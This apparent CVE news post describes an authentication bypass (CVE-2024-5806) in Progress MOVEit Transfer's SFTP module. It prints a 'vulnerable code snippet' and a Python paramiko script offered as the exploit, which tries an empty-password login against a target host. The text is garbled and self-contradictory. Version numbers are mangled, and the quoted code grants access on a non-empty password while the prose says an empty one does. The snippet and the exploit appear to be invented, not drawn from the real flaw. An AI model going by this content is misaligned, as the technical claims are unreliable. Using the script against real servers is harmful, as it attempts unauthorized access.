CVE CyberSecurity Database News

CVE-2024-5806 - Improper Authentication Vulnerability in Progress MOVEit Transfer's SFTP Module Leads to Authentication Bypass Risks

Poster -

A critical vulnerability, identified as CVE-2024-5806, has been discovered in the Progress MOVEit Transfer software, specifically within its SFTP module. This vulnerability arises from improper authentication and, if exploited, could lead to authentication bypass by an attacker. The affected MOVEit Transfer versions include 2023.. through 2023..10, 2023.1. through 2023.1.5, and 2024.. through 2024..1. In this post, we'll delve into the vulnerability, explore how it can be exploited, and look at how to mitigate the risk.

Vulnerability Details

The vulnerability is a result of improper authentication handling in the SFTP module of MOVEit Transfer. An attacker could exploit this vulnerability to bypass authentication and potentially gain unauthorized access to sensitive data and files stored within the affected virtual environment. This could lead to the compromising of sensitive information and potentially even allow further attacks on the associated network.

To better understand the vulnerability, let's take a closer look at the code snippet where the issue lies:

# Vulnerable code snippet in the SFTP module
def authenticate_user(username, password):
    if username == '':
        return False
    if password != '':
        return True

In the above code, the improper authentication handling allows an attacker to bypass the authentication if they provide a valid username and an empty password. This vulnerability makes it extremely important to patch the affected software immediately.

Exploit Details

To exploit the vulnerability, an attacker needs to identify a target system running an affected version of MOVEit Transfer. With knowledge of valid usernames in the target system, the attacker can attempt to bypass the authentication by sending an empty password during the SFTP connection request. Here's an example of how it can be done using a Python script:

# Exploit code for CVE-2024-5806
import paramiko

# Target details
target_host = 'example.com'
target_port = 22
valid_username = 'testuser'

# Create an SFTP client
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())

# Attempt a connection with empty password
try:
    client.connect(target_host, port=target_port, username=valid_username, password='')
    print("Authentication bypass successful.")
    # Access sensitive files and data here
except paramiko.AuthenticationException:
    print("Authentication bypass failed.")

This exploit demonstrates the potential ease with which an attacker can exploit the vulnerability. It is crucial to update or apply mitigation to safeguard affected versions of the software.

Original References

The vulnerability was officially documented in a CVE report. Further information can be obtained from the following links:

- CVE-2024-5806
- Progress MOVEit Security Advisory

Mitigation and Fixes

To mitigate the risk of exploitation, it is essential to update the affected versions of MOVEit Transfer immediately. Progress MOVEit has already provided security patches in the following versions:

MOVEit Transfer 2024..2

You can download the updated versions from the Progress MOVEit website.

It is also a good security practice to regularly monitor access logs for the software to identify any potential unauthorized access attempts and take prompt actions.

Conclusion

A severe vulnerability, CVE-2024-5806, has been found in Progress MOVEit Transfer software, affecting its SFTP module. With this vulnerability exploiting improper authentication handling, it could lead to authentication bypass and possible unauthorized access to sensitive data. Users and administrators working with the affected versions of the software should update as soon as possible and keep a close watch on system access logs for any signs of exploitation.

Timeline

Published on: 06/25/2024 15:15:15 UTC
Last modified on: 06/26/2024 00:15:11 UTC